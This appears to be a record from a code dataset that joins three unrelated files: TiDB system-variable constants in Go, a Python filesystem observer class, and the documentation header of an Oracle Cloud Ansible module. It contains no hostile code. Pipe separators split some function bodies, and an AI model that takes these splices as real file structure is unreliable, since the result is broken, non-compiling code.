// those indices can be scanned concurrently, with the cost of higher system performance impact.
TiDBBuildStatsConcurrency = "tidb_build_stats_concurrency"
// tidb_distsql_scan_concurrency is used to set the concurrency of a distsql scan task.
// A distsql scan task can be a table scan or an index scan, which may be distributed to many TiKV nodes.
// Higher concurrency may reduce latency, but with the cost of higher memory usage and system performance impact.
// If the query has a LIMIT clause, high concurrency makes the system do much more work than needed.
TiDBDistSQLScanConcurrency = "tidb_distsql_scan_concurrency"
// tidb_opt_insubquery_to_join_and_agg is used to enable/disable the optimizer rule of rewriting IN subquery.
TiDBOptInSubqToJoinAndAgg = "tidb_opt_insubq_to_join_and_agg"
// tidb_opt_prefer_range_scan is used to enable/disable the optimizer to always prefer range scan over table scan, ignoring their costs.
TiDBOptPreferRangeScan = "tidb_opt_prefer_range_scan"
// tidb_opt_correlation_threshold is a guard to enable row count estimation using column order correlation.
TiDBOptCorrelationThreshold = "tidb_opt_correlation_threshold"
// tidb_opt_correlation_exp_factor is an exponential factor to control heuristic approach when tidb_opt_correlation_threshold is not satisfied.
TiDBOptCorrelationExpFactor = "tidb_opt_correlation_exp_factor"
// tidb_opt_cpu_factor is the CPU cost of processing one expression for one row.
TiDBOptCPUFactor = "tidb_opt_cpu_factor"
// tidb_opt_copcpu_factor is the CPU cost of processing one expression for one row in coprocessor.
TiDBOptCopCPUFactor = "tidb_opt_copcpu_factor"
// tidb_opt_tiflash_concurrency_factor is concurrency number of tiflash computation.
TiDBOptTiFlashConcurrencyFactor = "tidb_opt_tiflash_concurrency_factor"
// tidb_opt_network_factor is the network cost of transferring 1 byte data.
TiDBOptNetworkFactor = "tidb_opt_network_factor"
// tidb_opt_scan_factor is the IO cost of scanning 1 byte data on TiKV.
TiDBOptScanFactor = "tidb_opt_scan_factor"
// tidb_opt_desc_factor is the IO cost of scanning 1 byte data on TiKV in desc order.
TiDBOptDescScanFactor = "tidb_opt_desc_factor"
// tidb_opt_seek_factor is the IO cost of seeking the start value in a range on TiKV or TiFlash.
TiDBOptSeekFactor = "tidb_opt_seek_factor"
// tidb_opt_memory_factor is the memory cost of storing one tuple.
TiDBOptMemoryFactor = "tidb_opt_memory_factor"
// tidb_opt_disk_factor is the IO cost of reading/writing one byte to temporary disk.
TiDBOptDiskFactor = "tidb_opt_disk_factor"
// tidb_opt_concurrency_factor is the CPU cost of additional one goroutine.
TiDBOptConcurrencyFactor = "tidb_opt_concurrency_factor"
// tidb_index_join_batch_size is used to set the batch size of a index lookup join.
// The index lookup join fetches batches of data from outer executor and constructs ranges for inner executor.
// This value controls how much data goes into one batch of the index join.
// A large value may reduce the latency but consumes more system resources.
TiDBIndexJoinBatchSize = "tidb_index_join_batch_size"
// tidb_index_lookup_size is used for index lookup executor.
// The index lookup executor first scans a batch of handles from an index, then uses those handles to look up the table
// rows; this value controls how many handles in a batch are used for a lookup task.
// A small value sends more RPCs to TiKV and consumes more system resources.
// A large value may do more work than needed if the query has a limit.
TiDBIndexLookupSize = "tidb_index_lookup_size"
// tidb_index_lookup_concurrency is used for index lookup executor.
// A lookup task may have 'tidb_index_lookup_size' of handles at maximum; the handles may be distributed
// across many TiKV nodes, so we execute multiple index lookup tasks concurrently to reduce the time
// waiting for a task to finish.
// Set this value higher may reduce the latency but consumes more system resource.
// tidb_index_lookup_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBIndexLookupConcurrency = "tidb_index_lookup_concurrency"
// tidb_index_lookup_join_concurrency is used for index lookup join executor.
// IndexLookUpJoin starts "tidb_index_lookup_join_concurrency" inner workers
// to fetch inner rows and join the matched (outer, inner) row pairs.
// tidb_index_lookup_join_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBIndexLookupJoinConcurrency = "tidb_index_lookup_join_concurrency"
// tidb_index_serial_scan_concurrency is used for controlling the concurrency of index scan operation
// when we need to keep the data output order the same as the order of index data.
TiDBIndexSerialScanConcurrency = "tidb_index_serial_scan_concurrency"
// TiDBMaxChunkSize is used to control the max chunk size during query execution.
TiDBMaxChunkSize = "tidb_max_chunk_size"
// TiDBAllowBatchCop means if we should send batch coprocessor to TiFlash. It can be set to 0, 1 and 2.
// 0 means never use batch cop, 1 means use batch cop in case of aggregation and join, and 2 means force sending batch cop for any query.
// The default value is 0
TiDBAllowBatchCop = "tidb_allow_batch_cop"
// TiDBAllowMPPExecution means if we should use mpp way to execute query or not.
// Default value is `true`, means to be determined by the optimizer.
// Value set to `false` means never use mpp.
TiDBAllowMPPExecution = "tidb_allow_mpp"
// TiDBEnforceMPPExecution means if we should enforce mpp way to execute query or not.
// Default value is `false`, means to be determined by variable `tidb_allow_mpp`.
// Value set to `true` means enforce use mpp.
// Note if you want to set `tidb_enforce_mpp` to `true`, you must set `tidb_allow_mpp` to `true` first.
TiDBEnforceMPPExecution = "tidb_enforce_mpp"
// TiDBInitChunkSize is used to control the init chunk size during query execution.
TiDBInitChunkSize = "tidb_init_chunk_size"
// tidb_enable_cascades_planner is used to control whether to enable the cascades planner.
TiDBEnableCascadesPlanner = "tidb_enable_cascades_planner"
// tidb_skip_utf8_check skips the UTF8 validation process; validating UTF8 has a performance cost, so if we can make sure
// the input string values are valid, we can skip the check.
TiDBSkipUTF8Check = "tidb_skip_utf8_check"
// tidb_skip_ascii_check skips the ASCII validation process.
// Old tidb may already have fields with invalid ASCII bytes;
// disabling ASCII validation can guarantee safe replication.
TiDBSkipASCIICheck = "tidb_skip_ascii_check"
// tidb_hash_join_concurrency is used for hash join executor.
// The hash join outer executor starts multiple concurrent join workers to probe the hash table.
// tidb_hash_join_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashJoinConcurrency = "tidb_hash_join_concurrency"
// tidb_projection_concurrency is used for projection operator.
// This variable controls the worker number of projection operator.
// tidb_projection_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBProjectionConcurrency = "tidb_projection_concurrency"
// tidb_hashagg_partial_concurrency is used for hash agg executor.
// The hash agg executor starts multiple concurrent partial workers to do partial aggregate works.
// tidb_hashagg_partial_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashAggPartialConcurrency = "tidb_hashagg_partial_concurrency"
// tidb_hashagg_final_concurrency is used for hash agg executor.
// The hash agg executor starts multiple concurrent final workers to do final aggregate works.
// tidb_hashagg_final_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBHashAggFinalConcurrency = "tidb_hashagg_final_concurrency"
// tidb_window_concurrency is used for window parallel executor.
// tidb_window_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBWindowConcurrency = "tidb_window_concurrency"
// tidb_merge_join_concurrency is used for merge join parallel executor
TiDBMergeJoinConcurrency = "tidb_merge_join_concurrency"
// tidb_stream_agg_concurrency is used for stream aggregation parallel executor.
// tidb_stream_agg_concurrency is deprecated, use tidb_executor_concurrency instead.
TiDBStreamAggConcurrency = "tidb_streamagg_concurrency"
// tidb_enable_parallel_apply is used for parallel apply.
TiDBEnableParallelApply = "tidb_enable_parallel_apply"
// tidb_backoff_lock_fast is used for tikv backoff base time in milliseconds.
TiDBBackoffLockFast = "tidb_backoff_lock_fast"
// tidb_backoff_weight is used to control the max back off time in TiDB.
// The default maximum back off time is a small value.
// BackOffWeight could multiply it to let the user adjust the maximum time for retrying.
// Only positive integers can be accepted, which means that the maximum back off time can only grow.
TiDBBackOffWeight = "tidb_backoff_weight"
// tidb_ddl_reorg_worker_cnt defines the count of ddl reorg workers.
TiDBDDLReorgWorkerCount = "tidb_ddl_reorg_worker_cnt"
// tidb_ddl_reorg_batch_size defines the transaction batch size of ddl reorg workers.
TiDBDDLReorgBatchSize = "tidb_ddl_reorg_batch_size"
// tidb_ddl_error_count_limit defines the count of ddl error limit.
TiDBDDLErrorCountLimit = "tidb_ddl_error_count_limit"
// tidb_ddl_reorg_priority defines the operations priority of adding indices.
// It can be: PRIORITY_LOW, PRIORITY_NORMAL, PRIORITY_HIGH
TiDBDDLReorgPriority = "tidb_ddl_reorg_priority"
// TiDBEnableChangeMultiSchema is used to control whether to enable the change multi schema.
TiDBEnableChangeMultiSchema = "tidb_enable_change_multi_schema"
// TiDBEnablePointGetCache is used to control whether to enable the point get cache for special scenario.
TiDBEnablePointGetCache = "tidb_enable_point_get_cache"
// TiDBEnableAlterPlacement is used to control whether to enable alter table partition.
TiDBEnableAlterPlacement = "tidb_enable_alter_placement"
// tidb_max_delta_schema_count defines the max length of deltaSchemaInfos.
// deltaSchemaInfos is a queue that maintains the history of schema changes.
TiDBMaxDeltaSchemaCount = "tidb_max_delta_schema_count"
// tidb_scatter_region will scatter the regions for DDLs when it is ON.
TiDBScatterRegion = "tidb_scatter_region"
// TiDBWaitSplitRegionFinish defines whether the split region behaviour is sync or async.
TiDBWaitSplitRegionFinish = "tidb_wait_split_region_finish"
// TiDBWaitSplitRegionTimeout is used to set the split and scatter region back off time.
TiDBWaitSplitRegionTimeout = "tidb_wait_split_region_timeout"
// tidb_force_priority defines the operations priority of all statements.
// It can be "NO_PRIORITY", "LOW_PRIORITY", "HIGH_PRIORITY", "DELAYED"
TiDBForcePriority = "tidb_force_priority"
// tidb_constraint_check_in_place indicates checking the constraint while the SQL is executing.
// It could hurt the performance of bulk inserts when it is ON.
TiDBConstraintCheckInPlace = "tidb_constraint_check_in_place"
// tidb_enable_window_function is used to control whether to enable the window function.
TiDBEnableWindowFunction = "tidb_enable_window_function"
// tidb_enable_pipelined_window_function is used to control whether to use pipelined window function, it only works when tidb_enable_window_function = true.
TiDBEnablePipelinedWindowFunction = "tidb_enable_pipelined_window_function"
// tidb_enable_strict_double_type_check is used to control table field double type syntax check.
TiDBEnableStrictDoubleTypeCheck = "tidb_enable_strict_double_type_check"
// tidb_enable_vectorized_expression is used to control whether to enable the vectorized expression evaluation.
TiDBEnableVectorizedExpression = "tidb_enable_vectorized_expression"
// TiDBOptJoinReorderThreshold defines the threshold less than which
// we'll choose a rather time consuming algorithm to calculate the join order.
TiDBOptJoinReorderThreshold = "tidb_opt_join_reorder_threshold"
// SlowQueryFile indicates which slow query log file for SLOW_QUERY table to parse.
TiDBSlowQueryFile = "tidb_slow_query_file"
// TiDBEnableFastAnalyze indicates to use fast analyze.
TiDBEnableFastAnalyze = "tidb_enable_fast_analyze"
// TiDBExpensiveQueryTimeThreshold indicates the time threshold of expensive query.
TiDBExpensiveQueryTimeThreshold = "tidb_expensive_query_time_threshold"
// TiDBEnableIndexMerge indicates to generate IndexMergePath.
TiDBEnableIndexMerge = "tidb_enable_index_merge"
// TiDBEnableNoopFuncs set true will enable using fake funcs(like get_lock release_lock)
TiDBEnableNoopFuncs = "tidb_enable_noop_functions"
// TiDBEnableStmtSummary indicates whether the statement summary is enabled.
TiDBEnableStmtSummary = "tidb_enable_stmt_summary"
// TiDBStmtSummaryInternalQuery indicates whether the statement summary contain internal query.
TiDBStmtSummaryInternalQuery = "tidb_stmt_summary_internal_query"
// TiDBStmtSummaryRefreshInterval indicates the refresh interval in seconds for each statement summary.
TiDBStmtSummaryRefreshInterval = "tidb_stmt_summary_refresh_interval"
// TiDBStmtSummaryHistorySize indicates the history size of each statement summary.
TiDBStmtSummaryHistorySize = "tidb_stmt_summary_history_size"
// TiDBStmtSummaryMaxStmtCount indicates the max number of statements kept in memory.
TiDBStmtSummaryMaxStmtCount = "tidb_stmt_summary_max_stmt_count"
// TiDBStmtSummaryMaxSQLLength indicates the max length of displayed normalized sql and sample sql.
TiDBStmtSummaryMaxSQLLength = "tidb_stmt_summary_max_sql_length"
// TiDBCapturePlanBaseline indicates whether the capture of plan baselines is enabled.
TiDBCapturePlanBaseline = "tidb_capture_plan_baselines"
// TiDBUsePlanBaselines indicates whether the use of plan baselines is enabled.
TiDBUsePlanBaselines = "tidb_use_plan_baselines"
// TiDBEvolvePlanBaselines indicates whether the evolution of plan baselines is enabled.
TiDBEvolvePlanBaselines = "tidb_evolve_plan_baselines"
// TiDBEnableExtendedStats indicates whether the extended statistics feature is enabled.
TiDBEnableExtendedStats = "tidb_enable_extended_stats"
// TiDBIsolationReadEngines indicates that tidb only reads from the stores whose engine type is included in IsolationReadEngines.
// Now, only TiKV and TiFlash are supported.
TiDBIsolationReadEngines = "tidb_isolation_read_engines"
// TiDBStoreLimit indicates the limit of sending request to a store, 0 means without limit.
TiDBStoreLimit = "tidb_store_limit"
// TiDBMetricSchemaStep indicates the step when query metric schema.
TiDBMetricSchemaStep = "tidb_metric_query_step"
// TiDBMetricSchemaRangeDuration indicates the range duration when query metric schema.
TiDBMetricSchemaRangeDuration = "tidb_metric_query_range_duration"
// TiDBEnableCollectExecutionInfo indicates whether execution info is collected.
TiDBEnableCollectExecutionInfo = "tidb_enable_collect_execution_info"
// TiDBExecutorConcurrency is used for controlling the concurrency of all types of executors.
TiDBExecutorConcurrency = "tidb_executor_concurrency"
// TiDBEnableClusteredIndex indicates if clustered index feature is enabled.
TiDBEnableClusteredIndex = "tidb_enable_clustered_index"
// TiDBPartitionPruneMode indicates the partition prune mode used.
TiDBPartitionPruneMode = "tidb_partition_prune_mode"
// TiDBSlowLogMasking is deprecated and an alias of TiDBRedactLog.
// Deprecated: use TiDBRedactLog instead.
TiDBSlowLogMasking = "tidb_slow_log_masking"
// TiDBRedactLog indicates whether to redact the log.
TiDBRedactLog = "tidb_redact_log"
// TiDBShardAllocateStep indicates the max size of continuous rowid shard in one transaction.
TiDBShardAllocateStep = "tidb_shard_allocate_step"
// TiDBEnableTelemetry indicates whether usage data reporting to PingCAP is enabled.
TiDBEnableTelemetry = "tidb_enable_telemetry"
// TiDBEnableAmendPessimisticTxn indicates if amend pessimistic transactions is enabled.
TiDBEnableAmendPessimisticTxn = "tidb_enable_amend_pessimistic_txn"
// TiDBMemoryUsageAlarmRatio indicates the memory usage ratio of the tidb-server above which an alarm is raised.
TiDBMemoryUsageAlarmRatio = "tidb_memory_usage_alarm_ratio"
// TiDBEnableRateLimitAction indicates whether the rate limit action is enabled.
TiDBEnableRateLimitAction = "tidb_enable_rate_limit_action"
// TiDBEnableAsyncCommit indicates whether to enable the async commit feature.
TiDBEnableAsyncCommit = "tidb_enable_async_commit"
// TiDBEnable1PC indicates whether to enable the one-phase commit feature.
TiDBEnable1PC = "tidb_enable_1pc"
// TiDBGuaranteeLinearizability indicates whether to guarantee linearizability.
TiDBGuaranteeLinearizability = "tidb_guarantee_linearizability"
// TiDBAnalyzeVersion indicates how TiDB collects the analyzed statistics and how they are used.
TiDBAnalyzeVersion = "tidb_analyze_version"
// TiDBEnableIndexMergeJoin indicates whether to enable index merge join.
TiDBEnableIndexMergeJoin = "tidb_enable_index_merge_join"
// TiDBTrackAggregateMemoryUsage indicates whether to track the memory usage of aggregate functions.
TiDBTrackAggregateMemoryUsage = "tidb_track_aggregate_memory_usage"
// TiDBEnableExchangePartition indicates whether to enable exchange partition.
TiDBEnableExchangePartition = "tidb_enable_exchange_partition"
// TiDBAllowFallbackToTiKV indicates the engine types whose unavailability triggers fallback to TiKV.
// Now we only support TiFlash.
TiDBAllowFallbackToTiKV = "tidb_allow_fallback_to_tikv"
// TiDBEnableTopSQL indicates whether the top SQL is enabled.
TiDBEnableTopSQL = "tidb_enable_top_sql"
// TiDBTopSQLAgentAddress indicates the top SQL agent address.
TiDBTopSQLAgentAddress = "tidb_top_sql_agent_address"
// TiDBTopSQLPrecisionSeconds indicates the top SQL precision seconds.
TiDBTopSQLPrecisionSeconds = "tidb_top_sql_precision_seconds"
// TiDBTopSQLMaxStatementCount indicates the max number of statements been collected.
TiDBTopSQLMaxStatementCount = "tidb_top_sql_max_statement_count"
// TiDBTopSQLMaxCollect indicates the max capacity of the collect map.
TiDBTopSQLMaxCollect = "tidb_top_sql_max_collect"
// TiDBTopSQLReportIntervalSeconds indicates the top SQL report interval seconds.
TiDBTopSQLReportIntervalSeconds = "tidb_top_sql_report_interval_seconds"
// TiDBEnableGlobalTemporaryTable indicates whether to enable global temporary table
TiDBEnableGlobalTemporaryTable = "tidb_enable_global_temporary_table"
// TiDBEnableLocalTxn indicates whether to enable Local Txn.
TiDBEnableLocalTxn = "tidb_enable_local_txn"
// TiDBEnableOrderedResultMode indicates whether to stabilize query results.
TiDBEnableOrderedResultMode = "tidb_enable_ordered_result_mode"
)
// TiDB vars that have only global scope
const (
// TiDBGCEnable turns garbage collection on or off.
TiDBGCEnable = "tidb_gc_enable"
// TiDBGCRunInterval sets the interval that GC runs
TiDBGCRunInterval = "tidb_gc_run_interval"
// TiDBGCLifetime sets the retention window of older versions
TiDBGCLifetime = "tidb_gc_life_time"
// TiDBGCConcurrency sets the concurrency of garbage collection. -1 = AUTO value
TiDBGCConcurrency = "tidb_gc_concurrency"
// TiDBGCScanLockMode enables the green GC feature (default)
TiDBGCScanLockMode = "tidb_gc_scan_lock_mode"
// TiDBEnableEnhancedSecurity restricts SUPER users from certain operations.
TiDBEnableEnhancedSecurity = "tidb_enable_enhanced_security"
)
// Default TiDB system variable values.
const (
DefHostname = "localhost"
DefIndexLookupConcurrency = ConcurrencyUnset
DefIndexLookupJoinConcurrency = ConcurrencyUnset
DefIndexSerialScanConcurrency = 1
DefIndexJoinBatchSize = 25000
DefIndexLookupSize = 20000
DefDistSQLScanConcurrency = 15
DefBuildStatsConcurrency = 4
DefAutoAnalyzeRatio = 0.5
DefAutoAnalyzeStartTime = "00:00 +0000"
DefAutoAnalyzeEndTime = "23:59 +0000"
DefAutoIncrementIncrement = 1
DefAutoIncrementOffset = 1
DefChecksumTableConcurrency = 4
DefSkipUTF8Check = false
DefSkipASCIICheck = false
DefOptAggPushDown = false
DefOptBCJ = false
DefOptCartesianBCJ = 1
DefOptMPPOuterJoinFixedBuildSide = false
DefOptWriteRowID = false
DefOptCorrelationThreshold = 0.9
DefOptCorrelationExpFactor = 1
DefOptCPUFactor = 3.0
DefOptCopCPUFactor = 3.0
DefOptTiFlashConcurrencyFactor = 24.0
DefOptNetworkFactor = 1.0
DefOptScanFactor = 1.5
DefOptDescScanFactor = 3.0
DefOptSeekFactor = 20.0
DefOptMemoryFactor = 0.001
DefOptDiskFactor = 1.5
DefOptConcurrencyFactor = 3.0
DefOptInSubqToJoinAndAgg = true
DefOptPreferRangeScan = false
DefBatchInsert = false
DefBatchDelete = false
DefBatchCommit = false
DefCurretTS = 0
DefInitChunkSize = 32
DefMaxChunkSize = 1024
DefDMLBatchSize = 0
DefMaxPreparedStmtCount = -1
DefWaitTimeout = 0
DefTiDBMemQuotaApplyCache = 32 << 20 // 32MB.
DefTiDBMemQuotaHashJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaMergeJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaSort = 32 << 30 // 32GB.
DefTiDBMemQuotaTopn = 32 << 30 // 32GB.
DefTiDBMemQuotaIndexLookupReader = 32 << 30 // 32GB.
DefTiDBMemQuotaIndexLookupJoin = 32 << 30 // 32GB.
DefTiDBMemQuotaDistSQL = 32 << 30 // 32GB.
DefTiDBGeneralLog = false
DefTiDBPProfSQLCPU = 0
DefTiDBRetryLimit = 10
DefTiDBDisableTxnAutoRetry = true
DefTiDBConstraintCheckInPlace = false
DefTiDBHashJoinConcurrency = ConcurrencyUnset
DefTiDBProjectionConcurrency = ConcurrencyUnset
DefBroadcastJoinThresholdSize = 100 * 1024 * 1024
DefBroadcastJoinThresholdCount = 10 * 1024
DefTiDBOptimizerSelectivityLevel = 0
DefTiDBAllowBatchCop = 1
DefTiDBAllowMPPExecution = true
DefTiDBEnforceMPPExecution = false
DefTiDBTxnMode = ""
DefTiDBRowFormatV1 = 1
DefTiDBRowFormatV2 = 2
DefTiDBDDLReorgWorkerCount = 4
DefTiDBDDLReorgBatchSize = 256
DefTiDBDDLErrorCountLimit = 512
DefTiDBMaxDeltaSchemaCount = 1024
DefTiDBChangeMultiSchema = false
DefTiDBPointGetCache = false
DefTiDBEnableAlterPlacement = false
DefTiDBHashAggPartialConcurrency = ConcurrencyUnset
DefTiDBHashAggFinalConcurrency = ConcurrencyUnset
DefTiDBWindowConcurrency = ConcurrencyUnset
DefTiDBMergeJoinConcurrency = 1 // disable optimization by default
DefTiDBStreamAggConcurrency = 1
DefTiDBForcePriority = mysql.NoPriority
DefEnableWindowFunction = true
DefEnablePipelinedWindowFunction = true
DefEnableStrictDoubleTypeCheck = true
DefEnableVectorizedExpression = true
DefTiDBOptJoinReorderThreshold = 0
DefTiDBDDLSlowOprThreshold = 300
DefTiDBUseFastAnalyze = false
DefTiDBSkipIsolationLevelCheck = false
DefTiDBExpensiveQueryTimeThreshold = 60 // 60s
DefTiDBScatterRegion = false
DefTiDBWaitSplitRegionFinish = true
DefWaitSplitRegionTimeout = 300 // 300s
DefTiDBEnableNoopFuncs = false
DefTiDBAllowRemoveAutoInc = false
DefTiDBUsePlanBaselines = true
DefTiDBEvolvePlanBaselines = false
DefTiDBEvolvePlanTaskMaxTime = 600 // 600s
DefTiDBEvolvePlanTaskStartTime = "00:00 +0000"
DefTiDBEvolvePlanTaskEndTime = "23:59 +0000"
DefInnodbLockWaitTimeout = 50 // 50s
DefTiDBStoreLimit = 0
DefTiDBMetricSchemaStep = 60 // 60s
DefTiDBMetricSchemaRangeDuration = 60 // 60s
DefTiDBFoundInPlanCache = false
DefTiDBFoundInBinding = false
DefTiDBEnableCollectExecutionInfo = true
DefTiDBAllowAutoRandExplicitInsert = false
DefTiDBEnableClusteredIndex = ClusteredIndexDefModeIntOnly
DefTiDBRedactLog = false
DefTiDBShardAllocateStep = math.MaxInt64
DefTiDBEnableTelemetry = true
DefTiDBEnableParallelApply = false
DefTiDBEnableAmendPessimisticTxn = false
DefTiDBPartitionPruneMode = "static"
DefTiDBEnableRateLimitAction = true
DefTiDBEnableAsyncCommit = false
DefTiDBEnable1PC = false
DefTiDBGuaranteeLinearizability = true
DefTiDBAnalyzeVersion = 2
DefTiDBEnableIndexMergeJoin = false
DefTiDBTrackAggregateMemoryUsage = true
DefTiDBEnableExchangePartition = false
DefCTEMaxRecursionDepth = 1000
DefTiDBTopSQLEnable = false
DefTiDBTopSQLAgentAddress = ""
DefTiDBTopSQLPrecisionSeconds = 1
DefTiDBTopSQLMaxStatementCount = 200
DefTiDBTopSQLMaxCollect = 10000
DefTiDBTopSQLReportIntervalSeconds = 60
DefTiDBEnableGlobalTemporaryTable = false
DefTMPTableSize = 16777216
DefTiDBEnableLocalTxn = false
DefTiDBEnableOrderedResultMode = false
)
// Process global variables.
var (
ProcessGeneralLog = atomic.NewBool(false)
EnablePProfSQLCPU = atomic.NewBool(false)
ddlReorgWorkerCounter int32 = DefTiDBDDLReorgWorkerCount
maxDDLReorgWorkerCount int32 = 128
ddlReorgBatchSize int32 = DefTiDBDDLReorgBatchSize
ddlErrorCountlimit int64 = DefTiDBDDLErrorCountLimit
ddlReorgRowFormat int64 = DefTiDBRowFormatV2
maxDeltaSchemaCount int64 = DefTiDBMaxDeltaSchemaCount
// Export for testing.
MaxDDLReorgBatchSize int32 = 10240
MinDDLReorgBatchSize int32 = 32
// DDLSlowOprThreshold is the threshold for ddl slow operations; the unit is millisecond.
DDLSlowOprThreshold uint32 = DefTiDBDDLSlowOprThreshold
ForcePriority = int32(DefTiDBForcePriority)
MaxOfMaxAllowedPacket uint64 = 1073741824
ExpensiveQueryTimeThreshold uint64 = DefTiDBExpensiveQueryTimeThreshold
MinExpensiveQueryTimeThreshold uint64 = 10 // 10s
CapturePlanBaseline = serverGlobalVariable{globalVal: Off}
DefExecutorConcurrency = 5
MemoryUsageAlarmRatio = atomic.NewFloat64(config.GetGlobalConfig().Performance.MemoryUsageAlarmRatio)
TopSQLVariable = TopSQL{
Enable: atomic.NewBool(DefTiDBTopSQLEnable),
AgentAddress: atomic.NewString(DefTiDBTopSQLAgentAddress),
PrecisionSeconds: atomic.NewInt64(DefTiDBTopSQLPrecisionSeconds),
MaxStatementCount: atomic.NewInt64(DefTiDBTopSQLMaxStatementCount),
MaxCollect: atomic.NewInt64(DefTiDBTopSQLMaxCollect),
ReportIntervalSeconds: atomic.NewInt64(DefTiDBTopSQLReportIntervalSeconds),
}
EnableLocalTxn = atomic.NewBool(DefTiDBEnableLocalTxn)
)
// TopSQL is the variable for control top sql feature.
type TopSQL struct {
// Enable top-sql or not.
Enable *atomic.Bool
// AgentAddress indicates the collect agent address.
AgentAddress *atomic.String
// The refresh interval of top-sql.
PrecisionSeconds *atomic.Int64
// The maximum number of statements kept in memory.
MaxStatementCount *atomic.Int64
// The maximum capacity of the collect map.
MaxCollect *atomic.Int64
// The report data interval of top-sql.
ReportIntervalSeconds *atomic.Int64
}
// TopSQLEnabled is used to check whether the top SQL feature is enabled.
func TopSQLEnabled() bool {
| return TopSQLVariable.Enable.Load() && TopSQLVariable.AgentAddress.Load() != ""
}
|
|
FileSystemObserver.py | import logging
import time
from threading import Event
from watchdog.observers import Observer
from .OutputEventHandler import OutputEventHandler
class FileSystemObserver(object):
| def __init__(self, test_output_dir):
self.test_output_dir = test_output_dir
# Start observing output dir
self.done_event = Event()
self.event_handler = OutputEventHandler(self.done_event)
self.observer = Observer()
self.observer.schedule(self.event_handler, self.test_output_dir, recursive=True)
self.observer.start()
def get_output_dir(self):
return self.test_output_dir
def restart_observer_if_needed(self):
if self.observer.is_alive():
return
self.observer = Observer()
self.done_event.clear()
self.observer.schedule(self.event_handler, self.test_output_dir, recursive=True)
self.observer.start()
def wait_for_output(self, timeout_seconds, output_validator, max_files):
logging.info('Waiting up to %d seconds for %d test outputs...', timeout_seconds, max_files)
self.restart_observer_if_needed()
wait_start_time = time.perf_counter()
for _ in range(max_files):
# Note: The timing on Event.wait() is inaccurate
self.done_event.wait(timeout_seconds)
self.done_event.clear()
current_time = time.perf_counter()
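# Stop waiting once the overall timeout has elapsed or the validator confirms all expected outputs are present.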
if timeout_seconds < (current_time - wait_start_time) or output_validator.validate():
break
self.observer.stop()
self.observer.join() |
|
oci_data_catalog_namespace_facts.py | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_data_catalog_namespace_facts
short_description: Fetches details about one or multiple Namespace resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple Namespace resources in Oracle Cloud Infrastructure
- Returns a list of namespaces within a data catalog.
- If I(namespace_id) is specified, the details of a single Namespace will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
catalog_id:
description:
- Unique catalog identifier.
type: str
required: true
namespace_id:
description:
- Unique namespace identifier.
- Required to get a specific namespace.
type: str
aliases: ["id"]
fields:
description:
- Specifies the fields to return in a namespace response.
type: list
elements: str
choices:
- "key"
- "displayName"
- "description"
- "lifecycleState"
- "timeCreated"
- "timeUpdated"
- "createdById"
- "updatedById"
- "properties"
display_name:
description:
- A filter to return only resources that match the entire display name given. The match is not case sensitive.
type: str
aliases: ["name"]
display_name_contains:
description:
- "A filter to return only resources that match display name pattern given. The match is not case sensitive.
For Example : /folders?displayNameContains=Cu.*
The above would match all folders with display name that starts with \\"Cu\\" or has the pattern \\"Cu\\" anywhere in between."
type: str
lifecycle_state:
description:
- A filter to return only resources that match the specified lifecycle state. The value is case insensitive.
type: str
choices:
- "CREATING"
- "ACTIVE"
- "INACTIVE"
- "UPDATING"
- "DELETING"
- "DELETED"
- "FAILED"
- "MOVING"
time_created:
description:
- Time that the resource was created. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
type: str
time_updated:
description:
- Time that the resource was updated. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
type: str
created_by_id:
description:
- OCID of the user who created the resource.
type: str
updated_by_id:
description:
- OCID of the user who updated the resource.
type: str
sort_by:
description:
- The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is
ascending. If no value is specified TIMECREATED is default.
type: str
choices:
- "TIMECREATED"
- "DISPLAYNAME"
sort_order:
description:
- The sort order to use, either 'asc' or 'desc'.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific namespace
oci_data_catalog_namespace_facts:
# required
catalog_id: "ocid1.catalog.oc1..xxxxxxEXAMPLExxxxxx"
namespace_id: "ocid1.namespace.oc1..xxxxxxEXAMPLExxxxxx"
# optional
fields: [ "key" ]
- name: List namespaces
oci_data_catalog_namespace_facts:
# required
catalog_id: "ocid1.catalog.oc1..xxxxxxEXAMPLExxxxxx"
# optional
fields: [ "key" ]
display_name: display_name_example
display_name_contains: display_name_contains_example
lifecycle_state: CREATING
time_created: 2013-10-20T19:20:30+01:00
time_updated: 2013-10-20T19:20:30+01:00
created_by_id: "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx"
updated_by_id: "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
sort_by: TIMECREATED
sort_order: ASC
"""
RETURN = """
namespaces:
description:
- List of Namespace resources
returned: on success
type: complex
contains:
key:
description:
- Unique namespace key that is immutable.
returned: on success
type: str
sample: key_example
display_name:
description:
- Name of the Namespace
returned: on success
type: str
sample: display_name_example
description:
description:
- Description for the namespace
returned: on success
type: str
sample: description_example
is_service_defined:
description:
- If this field is defined by service or by a user
returned: on success
type: bool
sample: true
lifecycle_state:
description:
- The current state of the namespace.
returned: on success
type: str
sample: CREATING
time_created:
description:
